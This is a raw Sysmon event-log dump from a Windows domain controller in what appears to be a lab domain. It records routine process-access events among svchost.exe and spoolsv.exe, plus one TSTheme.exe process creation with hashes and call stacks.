13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\system32\TSTheme.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000010089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.300{59A5CD1D-93F9-6005-EF04-00000000A301}4892C:\Windows\System32\TSTheme.exe10.0.14393.4169 (rs1_release.210107-1130)TSTheme Server ModuleMicrosoft® Windows® Operating SystemMicrosoft CorporationTSThemeS.exeC:\Windows\system32\TSTheme.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=D5E6B1DA9AEE1CC85A50894A07700B98,SHA256=3A22AAA677B8B658386F6A22ECFB36795DC1BE55AED591FEAA05CA8D36973464,IMPHASH=851EBF0BAEED8A212E02B93229FDC674{59A5CD1D-8E46-6005-0C00-00000000A301}596C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000010088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010069Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+773d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010068Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5964596C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010067Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:17.289{59A5CD1D-8E46-6005-0C00-00000000A301}5963772C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010066Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
